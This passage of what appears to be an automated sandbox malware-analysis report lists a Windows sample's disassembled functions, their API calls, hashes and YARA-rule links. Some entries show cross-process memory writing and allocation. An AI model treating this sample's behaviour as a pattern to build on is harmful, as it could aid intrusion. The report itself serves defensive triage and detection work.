                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                        • String ID:
                                                                        • API String ID: 3824534824-0
                                                                        • Opcode ID: 2d635541d67c2827a9400f841eef2a1dd2abc683e9aa2aacff766d5a797acd54
                                                                        • Instruction ID: d74a810d615d2f033ae9517ab2bacd98a438b7af81d266dae74d06d4c56f111c
                                                                        • Opcode Fuzzy Hash: 2d635541d67c2827a9400f841eef2a1dd2abc683e9aa2aacff766d5a797acd54
                                                                        • Instruction Fuzzy Hash: FB11E576A1C61CBBD7018BB99C14AEB7BACEB45331F144266F924D3252D671C90097A0
                                                                        Function 008E8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E821E
                                                                        • GetLastError.KERNEL32(?,008E7CE2,?,?,?), ref: 008E8228
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,008E7CE2,?,?,?), ref: 008E8237
                                                                        • HeapAlloc.KERNEL32(00000000,?,008E7CE2,?,?,?), ref: 008E823E
                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E8255
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 842720411-0
                                                                        • Opcode ID: c3647ab0908c231cb5ba81553dae92780249f8fb48f2e5e4f5c1dfbf4a290e21
                                                                        • Instruction ID: 2ff55968188535f5b0f3fce2ec28e59741f3d42ef47f238b8a115ba8b9167c48
                                                                        • Opcode Fuzzy Hash: c3647ab0908c231cb5ba81553dae92780249f8fb48f2e5e4f5c1dfbf4a290e21
                                                                        • Instruction Fuzzy Hash: 9A016971318648FFDB204FA6DC58DAB7BACFF8A795B504569F91DC2220DA318C00EA60
                                                                        Function 008E710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?,?,008E7455), ref: 008E7127
                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E7142
                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E7150
                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?), ref: 008E7160
                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E716C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 3897988419-0
                                                                        • Opcode ID: 915344188558658439c38f864fe0e409b60c213941cdaff4e3746851c159c07f
                                                                        • Instruction ID: 42665520aa0f3cfae5c540286c17092d4bbbe533d6feee71173102bbb1029140
                                                                        • Opcode Fuzzy Hash: 915344188558658439c38f864fe0e409b60c213941cdaff4e3746851c159c07f
                                                                        • Instruction Fuzzy Hash: D401BC72714308ABCB118F65DC44BAA7BACFB46791F1040A4FD09D2220E731DD01EBA0
                                                                        Function 008F5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F5260
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F526E
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F5276
                                                                        • QueryPerformanceCounter.KERNEL32(00955310,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F5280
                                                                        • Sleep.KERNEL32(000000FA,00000000,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F52BC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: a3821aa8c8dadee86324c32e249854240ab0db13f725c38eb406fcc29d2f4f31
                                                                        • Instruction ID: 2531e387050ae082b54d24e22260e653f60e4d1a1d9e0e3129b1eee96de5f51e
                                                                        • Opcode Fuzzy Hash: a3821aa8c8dadee86324c32e249854240ab0db13f725c38eb406fcc29d2f4f31
                                                                        • Instruction Fuzzy Hash: 69013531E19A1DEBCF00AFB4E859AEDBB78FB08711F414256EA41F2240CB309550DBA1
                                                                        Function 008E810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008E8121
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008E812B
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E813A
                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008E8141
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E8157
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 0f8f43cad911dd91d06ff9900c6061cc7882967bbf396d6f9f1cac3bb5eceec3
                                                                        • Instruction ID: 8493a92472a8246c0efa2c63739d438c7c55e40d06aefe3ef22037da21ee1114
                                                                        • Opcode Fuzzy Hash: 0f8f43cad911dd91d06ff9900c6061cc7882967bbf396d6f9f1cac3bb5eceec3
                                                                        • Instruction Fuzzy Hash: 91F06275354308FFEB120FA5EC98EAB3BACFF4A754B004125F959C6150CB619D42EA60
                                                                        Function 008EC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 008EC1F7
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 008EC20E
                                                                        • MessageBeep.USER32(00000000), ref: 008EC226
                                                                        • KillTimer.USER32(?,0000040A), ref: 008EC242
                                                                        • EndDialog.USER32(?,00000001), ref: 008EC25C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: 5b74de830594cc04be2f0889f037c19d1122ae982774269e2fb675ca80678d96
                                                                        • Instruction ID: b1147d8927956b0d8e6a62ae754831bfd6d29f107db3fa19c022ca213b9db6f6
                                                                        • Opcode Fuzzy Hash: 5b74de830594cc04be2f0889f037c19d1122ae982774269e2fb675ca80678d96
                                                                        • Instruction Fuzzy Hash: 9001F230A1870CABEB205B64EC4EB9677B8FB01B06F004269A652E00E0CBE06844DB80
                                                                        Function 008913B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                        • String ID:
                                                                        • API String ID: 2625713937-0
                                                                        • Opcode ID: b4d7a421ec43d5cd598f8b5cad73c1095ed6c68f4ef274a8b2cb46987794fe83
                                                                        • Instruction ID: aedffa658010230aef5447e9f124f0a197a72163bc0e9f3d40d60be4449667eb
                                                                        • Opcode Fuzzy Hash: b4d7a421ec43d5cd598f8b5cad73c1095ed6c68f4ef274a8b2cb46987794fe83
                                                                        • Instruction Fuzzy Hash: F8F0F63012CB09ABDF11AF26EC6C7983BA5F725326F09C224E52A881B2C7354995EF10
                                                                        Function 008FB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
                                                                        • CoInitialize.OLE32(00000000), ref: 008FB9BB
                                                                        • CoCreateInstance.OLE32(00922D6C,00000000,00000001,00922BDC,?), ref: 008FB9D4
                                                                        • CoUninitialize.OLE32 ref: 008FB9F1
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow
                                                                        • String ID: .lnk
                                                                        • API String ID: 3831848471-24824748
                                                                        • Opcode ID: 24a8363cc8d6529da52d3ca6b165579f7eb78e27cc80c0e3693b548b59d323d2
                                                                        • Instruction ID: dc300ff8e6e7aae89bd8197d3b9eec101471bf27b6db8753dac3aa591a35f77e
                                                                        • Opcode Fuzzy Hash: 24a8363cc8d6529da52d3ca6b165579f7eb78e27cc80c0e3693b548b59d323d2
                                                                        • Instruction Fuzzy Hash: 49A135756042059FCB00EF28C884D6ABBE5FF89324F148998F999DB261DB31EC45CB92
                                                                        Function 008B501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 008B50AD
                                                                          • Part of subcall function 008C00F0: __87except.LIBCMT ref: 008C012B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__87except__start
                                                                        • String ID: pow
                                                                        • API String ID: 2905807303-2276729525
                                                                        • Opcode ID: 9b1403537a9df33ae898950974b9d6c2f0477274ad09046b7f53969e101b51da
                                                                        • Instruction ID: f82482977fd4fca523d46f704c7061415392551b0d697e99db627702dcc28aea
                                                                        • Opcode Fuzzy Hash: 9b1403537a9df33ae898950974b9d6c2f0477274ad09046b7f53969e101b51da
                                                                        • Instruction Fuzzy Hash: F1515E6191CA05C6D722B72CC8057BE7BA4FB40780F248D5EE4D5C6399DE34CDC5AE82
                                                                        Function 008A6192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$_memmove
                                                                        • String ID: ERCP
                                                                        • API String ID: 2532777613-1384759551
                                                                        • Opcode ID: 5514cec330b28907040de7aa4f5cb3b80f69f8f84d616a87281a087acc054634
                                                                        • Instruction ID: 969c35f188a4d52e02f5d06787989198bfe0f2c4823618a1c8c8a5e4f70fa90b
                                                                        • Opcode Fuzzy Hash: 5514cec330b28907040de7aa4f5cb3b80f69f8f84d616a87281a087acc054634
                                                                        • Instruction Fuzzy Hash: CA51B170A00309DBEB24CF65C841BABB7E4FF05314F24496EE84ACB655E770EA54CB50
                                                                        Function 008E97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008F14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E9296,?,?,00000034,00000800,?,00000034), ref: 008F14E6
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008E983F
                                                                          • Part of subcall function 008F1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008F14B1
                                                                          • Part of subcall function 008F13DE: GetWindowThreadProcessId.USER32(?,?), ref: 008F1409
                                                                          • Part of subcall function 008F13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008E925A,00000034,?,?,00001004,00000000,00000000), ref: 008F1419
                                                                          • Part of subcall function 008F13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008E925A,00000034,?,?,00001004,00000000,00000000), ref: 008F142F
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008E98AC
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008E98F9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: 3100d0a872f765f03b1c8e314bbf807816bd16dff6e8547f8cc3158c1fa0d5d3
                                                                        • Instruction ID: a59b24fc9285f88efc5f3b18add1266c6d5c0eebbbe686ab742f503298033067
                                                                        • Opcode Fuzzy Hash: 3100d0a872f765f03b1c8e314bbf807816bd16dff6e8547f8cc3158c1fa0d5d3
                                                                        • Instruction Fuzzy Hash: BD413076A0021CAFDF10DFA4CC45AEEBBB8FB45300F104159FA55B7151DA716E45CBA1
                                                                        Function 00917946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0091F910,00000000,?,?,?,?), ref: 009179DF
                                                                        • GetWindowLongW.USER32 ref: 009179FC
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00917A0C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID: SysTreeView32
                                                                        • API String ID: 847901565-1698111956
                                                                        • Opcode ID: a232c25ed71abbc995488ab28d651ea5b4852ffa60b851726ec6c25b5b05b8db
                                                                        • Instruction ID: 1b4b5f93a3c9af96492916284ecb6cc62f95ed1a267e4db5d2ea4c23b0ebef6d
                                                                        • Opcode Fuzzy Hash: a232c25ed71abbc995488ab28d651ea5b4852ffa60b851726ec6c25b5b05b8db
                                                                        • Instruction Fuzzy Hash: 6931CE3120820AABDF119E78CC45BEAB7A9FF49334F244725F875D22E0D730E9919B50
                                                                        Function 009173D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00917461
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00917475
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00917499
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2326795674-1439706946
                                                                        • Opcode ID: e3fe9876c1a2d30e22cf8b6fad818180d72d18f9ccfefe3c997b0ac8e3ba1eb3
                                                                        • Instruction ID: f20628da460a4272dfc2966c9c3f07800cb2fe6ffa80792bfeb7fd8e87f37d5e
                                                                        • Opcode Fuzzy Hash: e3fe9876c1a2d30e22cf8b6fad818180d72d18f9ccfefe3c997b0ac8e3ba1eb3
                                                                        • Instruction Fuzzy Hash: EA21943261421DABDF11CF94CC46FEA7B7AEB48724F110114FE156B1E0D675AC91DB90
                                                                        Function 00917B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00917C4A
                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00917C58
                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00917C5F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$DestroyWindow
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 4014797782-2298589950
                                                                        • Opcode ID: f4fd425fa88397e4aa4152c21c2e869da6ec9af63c8dfd49009f8fe72167fd4a
                                                                        • Instruction ID: b3215b37032c8b09367419cbf72873a2122ee39fa0fe695bb3c1ac49e8d10a77
                                                                        • Opcode Fuzzy Hash: f4fd425fa88397e4aa4152c21c2e869da6ec9af63c8dfd49009f8fe72167fd4a
                                                                        • Instruction Fuzzy Hash: AE216BB1204209AFDB10DF68DCD1DA677EDEB593A4B144059FA019B3A1CB31EC419BA0
                                                                        Function 00916CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00916D3B
                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00916D4B
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00916D70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$MoveWindow
                                                                        • String ID: Listbox
                                                                        • API String ID: 3315199576-2633736733
                                                                        • Opcode ID: c357bac7251228daf800153668cda026d847131baa5b90f4ffda7be0362b5ce0
                                                                        • Instruction ID: cc4aac9f0ba495eb21821ade53d2299156c7353a62d93a88bc23f17640de6aca
                                                                        • Opcode Fuzzy Hash: c357bac7251228daf800153668cda026d847131baa5b90f4ffda7be0362b5ce0
                                                                        • Instruction Fuzzy Hash: F2218032B1411CBFEF118F54DC45EEB3BBEEB89764F418128FA459B1A0C6719C9197A0
                                                                        Function 008FAC40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 008FAC54
                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008FACA8
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0091F910), ref: 008FACFF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
